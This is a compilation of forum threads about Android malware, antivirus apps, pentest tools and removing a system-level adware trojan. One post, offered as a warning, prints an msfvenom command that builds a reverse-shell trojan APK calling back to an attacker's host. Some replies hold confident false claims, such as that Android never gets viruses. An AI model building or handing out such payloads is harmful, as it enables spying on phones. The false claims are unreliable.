Hi
I have a rooted agm Rock V5, i rooted it with a root zip provided in this site, and as third party applications, i installed dSploit, Anti from Zimperium, and droidSheep.
yesterday someone tried to log into my Facebook account, which i have synced in my smartphone. and i immediately changed my password.
just for the sake of completeness, i hav installed an anti-virus in my smart, the avast mobile security, and it detected 6 problems, all relating to dSploit, Droidsheep, and anti. : android Dploit A, android anti-c, android hackTool D, and several others, all related to these three packages.. :Anti, from Zimperium which is a pen testing application, droidsheep, and dSploit.
I ask now, are these warnings normal...? has my smartphone been compromised..? I have also ran the carrier IQ detection tool, and no rootkit has been detected...
What should i do... ?
BR
Alex
Uninstall all and don't always think of being the man in the middle...
Lim Wee Huat said:
Uninstall all and don't always think of being the man in the middle...
Click to expand...
Click to collapse
Thanks for your reply.
I just run them for fun, to see wether my own laptop is secure, I am using Ubuntu Linux 12.04 in my lappy...
But i mena, aren´t these applications supposed to be secure..? I am not talking about Anti, from Zimperium, deemed as a "pen-tester" tolkit, closed source, but things such as dsploit and droidsheep are compromised..?? I thought they were open source, and as such, highly unlikely to hide a rootkit or a Virus..
BR
Alex
I think you should go through following link
https://forum.avast.com/index.php?topic=123133.0
I searched for dSploit error & I feel that those apps need some more scrutiny.
Related
Hi,
i don't have a android phone yet. But i'm still a little bit frightened about data security there.
I read this article:
hxxp://w ww.theregister.co.uk/2010/06/28/google_remote_android_application_install/
I think normally you should decide yourself what to uninstall and what not.
So my question is - would it be possible to prevent Google from Accessing your phone, means prevent them from Installing / Uninstalling Applications.
Cause i hate this. My phone is my phone and they aren't allowed to play the "admin"
Regards
eagle
fear not
If you read further into this they are talking about malicious apps and it is done for the malicious app or apps only they are actually protecting your phone from being crippled and it is done systewide for those that use the market
APK's installed from SD can't be touched by Google. Only ones installed from the market can be removed. AFAIK so far they have only removed malicious apps(so far), but Googles definition of malicious is different to mine.
Hi,
thank you for your answers ! I know that they removed only a malicious app...but like mercianary already said: this time they only removed a malicious app ...
They could instead (of remote uninstall) just release a "fix" that you can download over the android market and this fix then cleans your mobile phone...
At least they can't remove stuff that you installed from SD ... this is good ...
But is there a way to modify the rom, so they won't have any access any more ?
Or can u disable this if you got root rights ?
Regards
eagle
P.S.
What else can google do with your phone ? What do they log ?
They take your soul. Piece by piece. Slowly over the years. Just like they do with every other product they give you for "free"
But that's another thread...
Sounds like humor but it's probably right :-/
The fact is ..:
I waited all time for Windows Phone 7. Thought that they would make it a good OS .. but now ... no Multitasking, ugly Menu ... it seems to me worse like the iOS (subjective opinion =) ) .
You don't have enough options/ settings and so on. It looks to me, like they try to copy Apple now, and they don't try to make it better =(
And now Android comes with tethering, Hotspot-Ability, a nice menu ... a "free" market , and so on.
Wouldn't i be afraid of Google i would choose it without hesitation.
You got any Pro Points for Win7 Phone ?
----
Don't get me started on Microsoft...
It's certainly possible to mod Market to disable this feature. Ofc you would need root to do this.
well with custom roms and rom specific apps you shouldn't have to worry because essentially you are loading and update zip so i think you'll be OK there and they would be morons to start randomly messing with peoples phones
Hi,
nice answers =) I like you I already got some
New Questions :
- Are there already such modified ROMS ?
- If not - will there be some ?
- @mercianary why i shouldn't get you started on Microsoft? Start please
What is your Fav OS ? Are you scared of google, too ?
On the Android site, they said that 4.3 checks every app you install by a blacklist maintained by Google and that each app is sandboxed. Do you guys think an AV is still necessary?
bump
http://forum.xda-developers.com/showthread.php?t=2226733
http://forum.xda-developers.com/showthread.php?t=2186782
http://forum.xda-developers.com/showthread.php?t=2041991
http://forum.xda-developers.com/showthread.php?t=1624199
http://forum.xda-developers.com/showthread.php?t=1917990
http://forum.xda-developers.com/showthread.php?t=2254029
and so on...:good:
Bump
TimeAndroid said:
On the Android site, they said that 4.3 checks every app you install by a blacklist maintained by Google and that each app is sandboxed. Do you guys think an AV is still necessary?
Click to expand...
Click to collapse
It really depends on how much you care about security. There has been several virus on Android, but most of the thing comes from Android applications. A Virus can come from an image, email attachment or anything else shared. But the question would more be: Who use Android for its security? There are much better operating systems for security maniacs.
I suppose that you mean AV for Anti-virus. Some apps claim to be anti-virus, but they are not at all. It's more of analyzing app behavior and permissions than virus registries.
I personally do not use Anti-Virus because I do nothing really sensitive. I don't even care if my android device is turned unto zombie bitcoin machine for others
etiennep said:
It really depends on how much you care about security. There has been several virus on Android, but most of the thing comes from Android applications. A Virus can come from an image, email attachment or anything else shared. But the question would more be: Who use Android for its security? There are much better operating systems for security maniacs.
I suppose that you mean AV for Anti-virus. Some apps claim to be anti-virus, but they are not at all. It's more of analyzing app behavior and permissions than virus registries.
I personally do not use Anti-Virus because I do nothing really sensitive. I don't even care if my android device is turned unto zombie bitcoin machine for others
Click to expand...
Click to collapse
I do not have anything sensitive
I do not open emails on my phone
I do not download apps 3 stars and below
Am I safe? :fingers-crossed:
I think u still need a good antivirus
Security is weak in Android but it can be achieved
If u dnt sidelode app
Dnt Root ur phon
Use a AV
If u do
Then after rooting
it is always unsecure
Thank you for helping me
Code:
This is just for Educational Purpose nothing else .......
So while i was learning about Linux . I came to know that there is a distro of Linux called Kali Linux. Kali Linux basically has 300+ Hacking tools and has this
metasploit framework in it . Basically it will either create a Windows Trojan or an Android Trojan . I researched about it a bit and came to know that when you basically type in the following in the Terminal.
Code:
msfvenom androidmeterpreter/reverse_tcp LHOST=YOUR IP LPORT=ANY3/4DIGITS R > anyname.apk
This command makes it to compile a .apk with the payload and creates it.
When installed in a Android Device it is installed as MainActivity.apk
It can access a phone's Contacts, SMS logs , Call Logs , MICROPHONE , CAMERA !!! , Device Tree , Contents of the Device , Keylogs etc...
It is a light trojan ( not more than 0.3 MB ) and can run in background unnoticed . These Information of your devices are streamed to the hacker and compromises your security . So never download unknown APKS from the web .
In /system/app By default, haves an stock app called, DefaultContainer.apk (fixed)
All androed haves drm server and DefaultContainer.apk
Someday i think: "if a disable this app?"
Well, good question:
Answer is (When try to installing by brute force or PackageInstaller With disabled DefaultContainer.apk)
Result:
Unable to install package...
No exploits like this will be done in little time soon.
Sent from SomeFon
Either Google Inc., or AOSP must ensure that the exploit of this nature mustn't be happening in the future...
Can you post a link to the exploit's documentation on Metasploit? I'm running Kali on my MacBook and my Android tablet - and I don't see how that exploit is still open. Looks closed based on quite a few security & OS upgrades since it was found.
yawn... you might as well have titled this "Water found in ocean"
For starters android is awesome and very very flawed (like most 10/10 chicks you will ever meet) This has been a media circus for like 10 yrs now I think.... especially as of very recently we have all concluded that android isn't secure enough to order pizza online (seriously) Every few months theres a headline "huge vulnerabilty detected in Android patch unavailable but uhhh coming soon" (5 yrs later)
As for Kali its the succesor or second edition to Backtrack linux. These are distros specifically made for penetration testing. Basically its another tool for network security experts to assess the condition of a networks known vulnerabilities that haven't been patched yet. Using metasploit you are able to scan a network to find any unpatched bugs and then it will apply the exploit for you. Also I assure you it is much more complicated then typing one command into a box.... one day lol ohhh and those pentesting distros (backtrack is now retired) are nothing special... it is just a basic version of linux that comes preinstalled with a TON of basically security app you would ever want It is generally not recommended to run kali as your personal OS especially if your are teh noobcakes..
Don't use blackmart app.
This a dangerous malware masked as
Paralel market
DonT use ANY MARKET APP
TRY cut by BRUTEFORCE YOUR DEVICE and delete urgent all that is gogle's apps!!
These apps are sending randomic authenthic .jar files and .dex files, to execute these binaries from the cache folder of these damn "markets"
Jar files, and dex files, ACCORDING WITH THE ANDROED MASTER KEY,
May gain root, may destroy your GPU or simply your device does not boot anymore.
I tried continue to use blackmart app with locked cache folder.
The app refuses to start
The app NEEDS CACHE FOLDER FREE
For starting their CHEATS.
AN APP THAT ⱢDENY STARTS WHEN CACHE FOLDER IS LOCKED, IS A MALWARE!
the app curiously worked with locked cache after a few days, but, now is refuaing.
BE AWARE WITH ALL CHIT THAT GOGLE'S SICK AND THEIR PESTS SLAVES ARE DOING WITH YOU
.
Sent from Somefon
epic wow.... like just woah
tried continue to use blackmart app with locked cache folder.
The app refuses to start
Click to expand...
Click to collapse
This my friend was not an educated decision whatsoever ... "googles got the freakin kung fu grip on me nads so I guess I will just burn it all down" hmmm
I completely kinda mostly agree with what you posted about Google "which is government owned and operated now for some time... along with their butt buddies facebook.... My humble suggestion would be to (VERY CAREFULLY) learn how to root, unlock the bootloader and then install a custom rom like cyanogenmod on your cellphone. and yeah I would never ever recommend pirate Google play... just.... no!
But really it doesn't matter in the end... android is sooooooo filled with critical exploits..... I wouldn't lose any sleep over it.... ll and don't worry the same it will only get worse over time with Google and the bully things that bullies do.
The exploits borns on critical os, on where begun in a DAMN INC. NAMED AS GOOGLE, that DOES NOT RECOMENDS ROOT, BECAUSE THEY ARE ROOT.
i never seen a windows or unix-like os without root
Did you seen any Linux LAN vulnerable to "exploits"??
If yes, pass me the trick for hack the entire facebok and opera servers!
Sent from Somefon
Yesterday after updating The Guardian (beta) app, I got a message that the app contains a virus and it should be removed immediately - so I did.
Today, I tried to figure out why, as I don't install anything outside playstore; what I found out was that, despite thinking that I have disabled it, Avast (which lives somewhere inside phone manager) checks every app upon installation. Running a scan showed, to my surprise, that I have another 4 apps with different virii!
Long story sort, by updating virus definitions from about one month ago to the most recent version, it doesn't detect any virus anymore.
Having said that, how can I permanently disable it? It is ridiculous and probably a security fail that a system app that is not controlled by Huawei or Google can download and run code on the phone.
Anyone else experienced the same?
supersakis said:
Yesterday after updating The Guardian (beta) app, I got a message that the app contains a virus and it should be removed immediately - so I did.
Today, I tried to figure out why, as I don't install anything outside playstore; what I found out was that, despite thinking that I have disabled it, Avast (which lives somewhere inside phone manager) checks every app upon installation. Running a scan showed, to my surprise, that I have another 4 apps with different virii!
Long story sort, by updating virus definitions from about one month ago to the most recent version, it doesn't detect any virus anymore.
Having said that, how can I permanently disable it? It is ridiculous and probably a security fail that a system app that is not controlled by Huawei or Google can download and run code on the phone.
Anyone else experienced the same?
Click to expand...
Click to collapse
as for my knowledge, android phones wont get affected by any kinda viruses bro
Rommco05 said:
I'm not sure about that. For example Malware and u still sending email, files... so u can send anything with this files (ransomware, malware...) maybe I'm wrong...
Click to expand...
Click to collapse
any kind of virus, even ransomeware, wont affect android smartphones!
always remember, linux machines and android machines never get any virus..
so, i recomend not to use any antivirus and bull**** apps which claim to free up ram for you!
i never used any antivirus apps from my first phone till now, and im now using my 11th phone
Rommco05 said:
Ok, so u received some infected file, in android nothing can do, but u can resend his to some pc, no?
Click to expand...
Click to collapse
that might cause problem to the pc you are sending the infected file to!
Rommco05 said:
...and if u have antivirus in phone, u know about that and can do something...
Click to expand...
Click to collapse
and antivirus apps of Android are not much effective scanners when compared to internet antivirus PC software, so, you will be having a very low chance of knowing any presence of a serious virus like ransomware
and if you could find out that the file is infectious, off course, you can delete the file or can do something about it so that it won't affect any PC, if you accidentally forward it to someone
Well , u will also see poor results if the last antivirus definitions updated are too old.
Hello,
Did anyone read the post? I am talking about the embedded antivirus that exists in this particular phone's firmware, which is powered by Avast. I didn't install it myself.
As for viruses: a lot of inaccuracies in the posts as well. Linux can get "viruses" - a better term would be malware. Android, especially the rooted ones, can also get malware that can persist reboots and in some cases even flashes. However, the kind of malware this particular antivirus catches is mostly in terms of spyware - the use of a toolkit that might try to steal sensitive data from your phone.
In any case, I was talking about a malfunction of this antivirus - which I cannot remove or disable - and I was wondering if anyone else witnessed anything similar. Now, if you don't even know that you have a version of Avast on your phone.. well.. that's a different story.
Hi,
I'm new to XDA. I think I'm in the right forum for my issue. My phone was infected with what I think is a type of auto rooting trojan. I was looking for info on an app I'm using called Duraspeed. I came across this website that started throwing popups at me saying my phone had tons of viruses, which was a lie. By the time I could break free from the drive by attacks, it was too late. I started getting sluggish performance on my phone and popup ads randomly. Even though it somehow gained root access, my phone is not rooted. Never was. Its still not! Because I checked with several apps off the playstore to confirm this. Long story short:
It put a file called "ads_popup-release.apk"
in my root folder /system/priv-app/
And modified a file called "8e710bb7.0"
in root folder /system/etc/security/cacerts/
or put (installed) the file there I'm not sure.
The file running on the phone as a system app is called "ad_surface"
I can only force stop and disable ad_surface without the ability to uninstall. I have to repeat this process every time I reboot. This stops the ads from popping up. Funny thing is, even though the force stop button in app settings is greyed meaning it was stopped and disabled, my OS Monitor app that shows running processes shows ad_surface is still running. Yet, it does stop the random popup ads by doing it this way. I've tried 360 AV, Avast, AVG, Malwarebytea, Kaspers, stubborn rootkit remover, a lot of antivirus programs but nothing detects it. I'm using Total Commander File Manager to view the device system partitions. I even copied the two trojan files to a folder on the user partition to see if any of the antivirus programs could check them there away from the root areas. But nothing. My guess is that I need to root my phone so I can gain access to the apk file and delete it. I haven't done a factory reset because I realize that apk file is in the recovery partition in order to reinstall itself. I've never rooted a phone before, but I have Kingroot installed. I downloaded it from XDA. I just don't have the guts to use it in fear of bricking. Do you think it would work with my phone? Does it abort the root procedure if it can't do it? Here are my phone specs:
Vortex Beat 8
Software build: 8_V1.5_20171011
Chipset: MT6580M Cortex-A7
CPU Architecture: ARMv7 Processor Rev 3(V71)
Cores: 4 1300MHz
Kernal Version: 3.18.19
Total Ram: 459MB
Internal ROM: 8GB (4GB for user)
That's about it. If there's anything anybody who could recommend how to go about this I would greatly appreciate the help. Thank you...
Go try factory resetting it, doesn't hurt to try.
If the "virus" is still there you can always re-flash the phones os. Here is the link to the stock ROM ---> http://www.needrom.com/wp-content/uploads/2017/04/BEAT-8_V1.06_20170413.rar
The below link is a tutorial on how to flash the phones ROM.
https://www.getdroidtips.com/stock-rom-vortex-beat-8/#How_to_Download_Stock_ROM_on_VORTEX_Beat_8
In mtkdroid tools, Have all the boxes unchecked, and make sure you only have "ANDRIOD" and "RECOVERY" checked marked. The other boxes are just about the phones information and properties. Theses shouldn't be checked because it might erase your imei/drivers or other stuff. After flashing the rom make sure you do a complete factory rest + cache. Erase whatever you have on ur sd cards or micro sd cards.
Just do this and call it a day
Good luck
Cool
Hi, thank you! I will try this. I will have to borrow someone's computer like my nephews. I did try Kingroot and OneClickRoot but they both failed. Perhaps due to a locked bootloader. Or the evil trojan that made itself super user blocking them. I did do a factory reset, but the trojan persist. My mistake was forgetting to turn off unknown sources in security settings. I think that's how it got in... I'll keep checking back on this thread in the meantime to see if someone knows a tool that can kill the trojan, but I doubt it. Cheers!
SecretSociety68 said:
Hi, thank you! I will try this. I will have to borrow someone's computer like my nephews. I did try Kingroot and OneClickRoot but they both failed. Perhaps due to a locked bootloader. Or the evil trojan that made itself super user blocking them. I did do a factory reset, but the trojan persist. My mistake was forgetting to turn off unknown sources in security settings. I think that's how it got in... I'll keep checking back on this thread in the meantime to see if someone knows a tool that can kill the trojan, but I doubt it. Cheers!
Click to expand...
Click to collapse
I'm having similar troubles I somehow believe I have an entire infected Network from Windows 10 to iOS and all the cell phones even two 3-g flip even the Smart car has been recognized I communicated with the virus / hacker Network I have no idea how to get rid of it I give his self super user privileges without quite rooting the phone and hides itself in system apps so it's virtually impossible to get rid of at least for me it is I have post here called wading deep Waters please do check it out
sassyfrassy said:
I'm having similar troubles I somehow believe I have an entire infected Network from Windows 10 to iOS and all the cell phones even two 3-g flip even the Smart car has been recognized I communicated with the virus / hacker Network I have no idea how to get rid of it I give his self super user privileges without quite rooting the phone and hides itself in system apps so it's virtually impossible to get rid of at least for me it is I have post here called wading deep Waters please do check it out
Click to expand...
Click to collapse
It isn't unheard of for a router to get infected with a virus/malware, rare, but not exactly impossible. I've run across others here over the years that have discussed this issue. I don't remember any specifics, tools or methods to fix the issue though, but you can probably find info on removing malware from a router.
Sent from my LGL84VL using Tapatalk
Droidriven said:
It isn't unheard of for a router to get infected with a virus/malware, rare, but not exactly impossible. I've run across others here over the years that have discussed this issue. I don't remember any specifics, tools or methods to fix the issue though, but you can probably find info on removing malware from a router.
Click to expand...
Click to collapse
Thank you for your prompt response I'm not positive that the router and modem are infected more or less they are overloaded from the amount of leeches in hitchhiker's I have from this awful network of hackers and code running through my TV's my cars for god sakes I read one of their lauder's I got in somehow and I could see that they were logging how many seconds it took me from getting out of the car to getting in my home that was just one scary example they could tell when my phone was in my pocket and if I was walking and how many people were with me this is just my cell phone not to mention my TV's the laptops I have no idea what to do
sassyfrassy said:
Thank you for your prompt response I'm not positive that the router and modem are infected more or less they are overloaded from the amount of leeches in hitchhiker's I have from this awful network of hackers and code running through my TV's my cars for god sakes I read one of their lauder's I got in somehow and I could see that they were logging how many seconds it took me from getting out of the car to getting in my home that was just one scary example they could tell when my phone was in my pocket and if I was walking and how many people were with me this is just my cell phone not to mention my TV's the laptops I have no idea what to do
Click to expand...
Click to collapse
It sounds to me like their hold over you has more to do with your personal information than with your devices. With certain pieces of your info, they can gain access to any device that you sign into, login to or even just enter information in while using, even if it isn't yours.
If your network provider randomly cycles IP addresses among its users, it could be that the hacker has previously hijacked that IP address while another user was using it and his access carried over to you when the IP was assigned to you. If this is so, a new IP and changing all of your account info among all of the various accounts you have would cut him off, maybe?
I'm not the best at network security issues that go that deep. My network management/LAN Admin days were a very long time ago, too many things have changed.
Sent from my LGL84VL using Tapatalk
Droidriven said:
It sounds to me like their hold over you has more to do with your personal information than with your devices. With certain pieces of your info, they can gain access to any device that you sign into, login to or even just enter information in while using, even if it isn't yours.
If your network provider randomly cycles IP addresses among its users, it could be that the hacker has previously hijacked that IP address while another user was using it and his access carried over to you when the IP was assigned to you. If this is so, a new IP and changing all of your account info among all of the various accounts you have would cut him off, maybe?
I'm not the best at network security issues that go that deep. My network management/LAN Admin days were a very long time ago, too many things have changed.
Click to expand...
Click to collapse
Thank you I really appreciate you taking the time to think about my situation I have had no one to talk to about this for 2 months
sassyfrassy said:
Thank you I really appreciate you taking the time to think about my situation I have had no one to talk to about this for 2 months
Click to expand...
Click to collapse
Not sure how much help I'll be to you. I'm no expert in what you're dealing with. I'm just telling you some possibilities that I've seen others dealing with over the years.
Sent from my LGL84VL using Tapatalk
Droidriven said:
It sounds to me like their hold over you has more to do with your personal information than with your devices. With certain pieces of your info, they can gain access to any device that you sign into, login to or even just enter information in while using, even if it isn't yours.
If your network provider randomly cycles IP addresses among its users, it could be that the hacker has previously hijacked that IP address while another user was using it and his access carried over to you when the IP was assigned to you. If this is so, a new IP and changing all of your account info among all of the various accounts you have would cut him off, maybe?
I'm not the best at network security issues that go that deep. My network management/LAN Admin days were a very long time ago, too many things have changed.
Click to expand...
Click to collapse
You hit the nail on the head! Told me "unfortunately we have met"
Sent from my LGE LGL158VL using XDA Labs
SecretSociety68 said:
It put a file called "ads_popup-release.apk"
in my root folder /system/priv-app/
Click to expand...
Click to collapse
translation it installed itself to the privilege app section on your phone which does not delete with a reset (new rom does) this also gives the app more power
it can only be done with root so the app rooted your phone (at least temp) here is a app that removes it but it needs root
https://f-droid.org/en/packages/de.j4velin.systemappmover/
And a system priv app has AFAIK full power however as of Oreo thier is another file to give it permisions so says google https://source.android.com/devices/tech/config/perms-whitelist namely
/etc/permissions/privapp-permissions-OEM_NAME.xml
/etc/permissions/privapp-permissions-DEVICE_NAME.xml
check these files and see what you find
SecretSociety68 said:
And modified a file called "8e710bb7.0"
in root folder /system/etc/security/cacerts/
or put (installed) the file there I'm not sure.
Click to expand...
Click to collapse
translation installed a CA certificate that enables them to have a SSL connection or with this certificate can spoof websites
of course this should be deleted but again you will need root (or new Rom)
SecretSociety68 said:
The file running on the phone as a system app is called "ad_surface"
Click to expand...
Click to collapse
The app has to be running with a linux GUID so you can check with that
the apps can not find root this can be because the program used root once to get a elevated status (temporary root) and then does not need it anymore
so you cannot find it. The question still remains how they did that but right now you need to get out.
Waiting for other response. Hehe.
I had this take control of multiple devices and 2 computers. 3 android phones and an apple iphone and 2 windows computers. I countless hours going through logs and data. On my android devices it even made a cloned version of TWRP so it would reinstall itself through recovery. I spent hours on the phone with samsung and apple senior advisors. I viewed the analytic data on the apple device over and over. Extremely werid things were running. Constantly writting system wwrites on a stock apple phone. It was able to transfer from device to device over wifi hotspot. It went on for over two months. I had a roku tv also become monitored. It was the craziest **** ive ever had happen to me. It litterally almost drove me insane and I thought I was going crazy. Ive never seen anything like it. Even google reaults were completely false and fake sites. I disnt know this happened to anyone else. Ive got countless logs and screenshots saved in case I ever needed to share the info. It even remotely sipped my desktop hard drives and had me connecring to a remote server on boot.
---------- Post added at 07:48 PM ---------- Previous post was at 07:37 PM ----------
I could make a phone call and hear breathing in the background. Id make a call and touch tone sounds would go off after the first ring. I was getting constant interference through my phone. It connected all my devices to a home group I never created. I literally had to destroy the devices
---------- Post added at 08:15 PM ---------- Previous post was at 07:48 PM ----------
Applied protocal - makes sense man, in juat glad I got it off my back. On the iphone, when yyou would install a new app from the "app store" it would run a wake up over 4000 times a second to wake up an unknown app in system files . im assuming this was to clone the app or change some code in it when it was installed. The app name was ??? In the analytic logs and it was an "event write system". This was some dirty stuff man. Is this something that is common right now? This exploit across so many devices? Id love to share some of these logs and screenshots if anyone is interested.
SecretSociety68 said:
Hi,
I'm new to XDA. I think I'm in the right forum for my issue. My phone was infected with what I think is a type of auto rooting trojan. I was looking for info on an app I'm using called Duraspeed. I came across this website that started throwing popups at me saying my phone had tons of viruses, which was a lie. By the time I could break free from the drive by attacks, it was too late. I started getting sluggish performance on my phone and popup ads randomly. Even though it somehow gained root access, my phone is not rooted. Never was. Its still not! Because I checked with several apps off the playstore to confirm this. Long story short:
It put a file called "ads_popup-release.apk"
in my root folder /system/priv-app/
And modified a file called "8e710bb7.0"
in root folder /system/etc/security/cacerts/
or put (installed) the file there I'm not sure.
The file running on the phone as a system app is called "ad_surface"
I can only force stop and disable ad_surface without the ability to uninstall. I have to repeat this process every time I reboot. This stops the ads from popping up. Funny thing is, even though the force stop button in app settings is greyed meaning it was stopped and disabled, my OS Monitor app that shows running processes shows ad_surface is still running. Yet, it does stop the random popup ads by doing it this way. I've tried 360 AV, Avast, AVG, Malwarebytea, Kaspers, stubborn rootkit remover, a lot of antivirus programs but nothing detects it. I'm using Total Commander File Manager to view the device system partitions. I even copied the two trojan files to a folder on the user partition to see if any of the antivirus programs could check them there away from the root areas. But nothing. My guess is that I need to root my phone so I can gain access to the apk file and delete it. I haven't done a factory reset because I realize that apk file is in the recovery partition in order to reinstall itself. I've never rooted a phone before, but I have Kingroot installed. I downloaded it from XDA. I just don't have the guts to use it in fear of bricking. Do you think it would work with my phone? Does it abort the root procedure if it can't do it? Here are my phone specs:
Vortex Beat 8
Software build: 8_V1.5_20171011
Chipset: MT6580M Cortex-A7
CPU Architecture: ARMv7 Processor Rev 3(V71)
Cores: 4 1300MHz
Kernal Version: 3.18.19
Total Ram: 459MB
Internal ROM: 8GB (4GB for user)
That's about it. If there's anything anybody who could recommend how to go about this I would greatly appreciate the help. Thank you...
Click to expand...
Click to collapse
Definitely malmare! Mine was called "Ad-Time", like a kid's show or something, but either way, very persistent and pervasive! I have 2 roms, (v 1.5 & 1.6), in img format, easy fastboot flash. Look at this phone wrong and it's rooted. Anybody interested, hit me up, I even got the couple-line script to install SuperSU /system (beat 8 doesn't like Magisk). A simple su.d script to enable permissive selinux, build.prop changes, and you have a $30 Nexus via MTK. I also ported TWRP 3.2.1(no bugs) & Philz, but TWRP is my comfort-zone.
Sent from my ZTE Sapphire 3G using XDA Labs
---------- Post added at 02:03 AM ---------- Previous post was at 01:48 AM ----------
sameboat said:
I had this take control of multiple devices and 2 computers. 3 android phones and an apple iphone and 2 windows computers. I countless hours going through logs and data. On my android devices it even made a cloned version of TWRP so it would reinstall itself through recovery. I spent hours on the phone with samsung and apple senior advisors. I viewed the analytic data on the apple device over and over. Extremely werid things were running. Constantly writting system wwrites on a stock apple phone. It was able to transfer from device to device over wifi hotspot. It went on for over two months. I had a roku tv also become monitored. It was the craziest **** ive ever had happen to me. It litterally almost drove me insane and I thought I was going crazy. Ive never seen anything like it. Even google reaults were completely false and fake sites. I disnt know this happened to anyone else. Ive got countless logs and screenshots saved in case I ever needed to share the info. It even remotely sipped my desktop hard drives and had me connecring to a remote server on boot.
---------- Post added at 07:48 PM ---------- Previous post was at 07:37 PM ----------
I could make a phone call and hear breathing in the background. Id make a call and touch tone sounds would go off after the first ring. I was getting constant interference through my phone. It connected all my devices to a home group I never created. I literally had to destroy the devices
---------- Post added at 08:15 PM ---------- Previous post was at 07:48 PM ----------
Applied protocal - makes sense man, in juat glad I got it off my back. On the iphone, when yyou would install a new app from the "app store" it would run a wake up over 4000 times a second to wake up an unknown app in system files . im assuming this was to clone the app or change some code in it when it was installed. The app name was ??? In the analytic logs and it was an "event write system". This was some dirty stuff man. Is this something that is common right now? This exploit across so many devices? Id love to share some of these logs and screenshots if anyone is interested.
Click to expand...
Click to collapse
Typical Chinese ad/malware/surveillance. If you visit china, you turn over your devices for "inspection", so they can sideload some state-sponsored goodies. A lot of these Chinese roms have the ads baked-in, like mine. Whoever's listening and seeing my pics is gonna need therapy, because I filled the phone up with some STRANGE s*** Remove the apk, but there's several .xml's and .jar's that gotta go, too.
Sent from my ZTE Sapphire 3G using XDA Labs
What is the best way to counter this problem?
Dassote said:
What is the best way to counter this problem?
Click to expand...
Click to collapse
Root, and remove all traces of the " ad_* " app and even the duraspeed app if you want, but I didn't see anything untrustworthy about that. Duraspeed is in the default.prop (running booster), so it's in the kernel. Root uninstall just leaves you no way to control, kuz the PROCESS will go and go, unless you're willing to play with the kernel. Not for amateurs like myself My Beat 8 has been flashed or fastboot-booted more times than I can count. Good times.
Once your Chinese spyware is uninstalled, delete build.prop lines with "running booster", /system/lib's with it, and I think it was in the /system/bin, and /vendor/app had one. Clear them all, and you'll need to tweak the build.prop some more. debug.qemu.kernel=1, ro.secure_storage.support=0, ro.debuggable=1, then reboot AFTER you chmod 644 the build.prop! The "debug.qemu.kernel=1" was what made the rest stick. ADD those props, but don't change the existing ones (kernel). I just deleted the default values, replaced with "" . Fits the whole debug vibe. I should upload a copy of my final build.prop, cheap-a** phone runs like a champ.
Sent from my LG G Stylo using XDA Labs